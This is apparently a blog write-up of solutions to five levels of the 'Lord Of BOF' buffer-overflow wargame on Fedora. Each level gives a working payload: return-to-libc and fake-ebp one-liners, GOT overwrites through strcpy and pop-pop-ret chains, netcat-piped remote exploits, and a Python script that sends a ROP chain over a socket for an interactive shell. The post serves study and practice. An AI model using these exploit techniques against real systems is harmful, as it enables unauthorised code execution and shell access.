Solutions
Level 1
- upgraded simple buffer overflow ; because of Operation System, there are some limits like random stack, ASLR, Ascii Armor, etc memory protection ; so we'd like to use RTL or ROP attack rather than using shellcode ; hint is fake ebp, and i'll use fake ebp + rtl ; and use execve instead of system ; because internal routine of system function, it re-sets geteuid value ; we need a code which elevate privilege and run /bin/sh because there no more can use shellcode ; so use this code as execve's argv ; careful there is a random stack so if we put some value on stack, it'll be changed every time, also execve's argv in payload ; by using ret address to ret, we can increase eip ; Code : #includeint main(int argc, char *argv[]){ setreuid(geteuid(), geteuid()); system("/bin/sh"); return 0; } ; execve address : 0x007a5490 + 1 : 0x007a5491 ; ret address : 0x08048441 ; for file name : 3c ed 83 ( what is on execve's argv[0], so i link my get-shell-program this point and when execve runs, it'll run ) ; payload : ln -s ./aaaa $(echo -en \x3c\xed\x83") : ./iron_golem $(python -c 'print "A"*268 + "\x41\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')
Level 2
- level 1 + can't deal with sfp ; but payload is same as level 1 ; we didn't need to use sfp area above payload ; ret address : 0x080484b9 ; payload : ./dark_eyes $(python -c 'print "A"*268 + "\xb9\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')
Level 3
- remote exploit + similar as level 2
; as we know, we can't use fake ebp at least on stack
; tips : do_system function works as execve("/bin/sh", .. ,0) so, just we run this func, we'll get shell! ( i just find it from internet )
; do_system address : 0x0075077f
; payload : (python -c 'print "A"*268 + "\x7f\x07\x75\x00"'; cat) | nc localhost 7777
Level 4
- got overwriting problem ; for making this prob easy, this binary gives us ppr gadget ; payload form will be like this A*268 strcpy@plt ppr printf@got+0 system[address of 'first byte'] strcpy@plt ppr printf@got+1 system[address of 'second byte'] strcpy@plt ppr printf@got+2 system[address of 'third byte'] strcpy@plt ppr printf@got+3 system[address of 'fourth byte'] printf@plt + A*4 + "/bin/sh" ; ppr address : 0x0804854c ; system address : 0x00 75 07 c0 ( we must find this char in fixed area like got ) ( i get gadget address from other blog hahaha ) ; strcpy@plt address : 0x08048494 ; printf@got address : 0x08049884 ; printf@plt address : 0x08048424 ; /bin/sh address : 0x00833603 ; payload : ./evil_wizard "$(python -c 'print "A"*268 + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x84\x98\x04\x08" + "\x20\x84\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x85\x98\x04\x08" + "\x2c\x80\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x86\x98\x04\x08" + "\xc8\x82\x04\x08" + "\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x87\x98\x04\x08" + "\x2d\x80\x04\x08" + "\x24\x84\x04\x08" + "A"*4 + "\x03\x36\x83\x00"')"
Level 5
- level 4 + cleaning buffer + remote exploit ; payload is similar as previous level ; and we'll use custom stack for saving /bin/sh\0, each chararcter. ; ppr address : 0x080484f3 ; gadget for system address : (get them from another blog haha) ; memcpy@got address : 0x08049850 ; memcpy@plt address : 0x08048418 ; custom stack address : 0x08049878 ; strcpy@plt address : 0x08048438 ; Python Code :
from socket import *
import os, struct
p = lambda x : struct.pack('<I', x)
ppr = 0x80484f3
strcpy_plt = 0x8048438
memcpy_plt = 0x8048418
memcpy_got = 0x8049850
cus_stack = 0x8049878
sys_1 = 0x80484d0
sys_2 = 0x804817c
sys_3 = 0x80482b4
sys_4 = 0x8048138
slash = 0x8048114
b = 0x8048117
i = 0x8048116
n = 0x804811e
s = 0x8048746
h = 0x80481b8
payload = "A"*268
# copy system address to memcpy_got
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got)
payload += p(sys_1)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+1)
payload += p(sys_2)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+2)
payload += p(sys_3)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+3)
payload += p(sys_4)
# copy /bin/sh\0 to custom stack
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+1)
payload += p(b)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+2)
payload += p(i)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+3)
payload += p(n)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+4)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+5)
payload += p(s)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+6)
payload += p(h)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+7)
payload += p(sys_4)
# run it!
payload += p(memcpy_plt)
payload += "A"*4
payload += p(cus_stack)
s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.254.130", 8888))
s.send(payload + '\n')
print s.recv(1024)
while True:
cmd = raw_input('$ ')
s.send(cmd + '\n')
print s.recv(1024)
s.close()
ALL CLEAR!
[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat ./*
,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'
[dark_stone@Fedora_1stFloor ~]$
'Wargames > Lord Of Bof' 카테고리의 다른 글
| [Lord Of Bof] Lord Of BOF Solutions ( Fedora 10 ) (0) | 2015.11.20 |
|---|---|
| [Lord Of Bof] Lord Of BOF Solutions ( Fedora 4 ) (0) | 2015.11.19 |
| [Lord Of Bof] Lord Of BOF Solutions ( Redhat ) (0) | 2014.04.27 |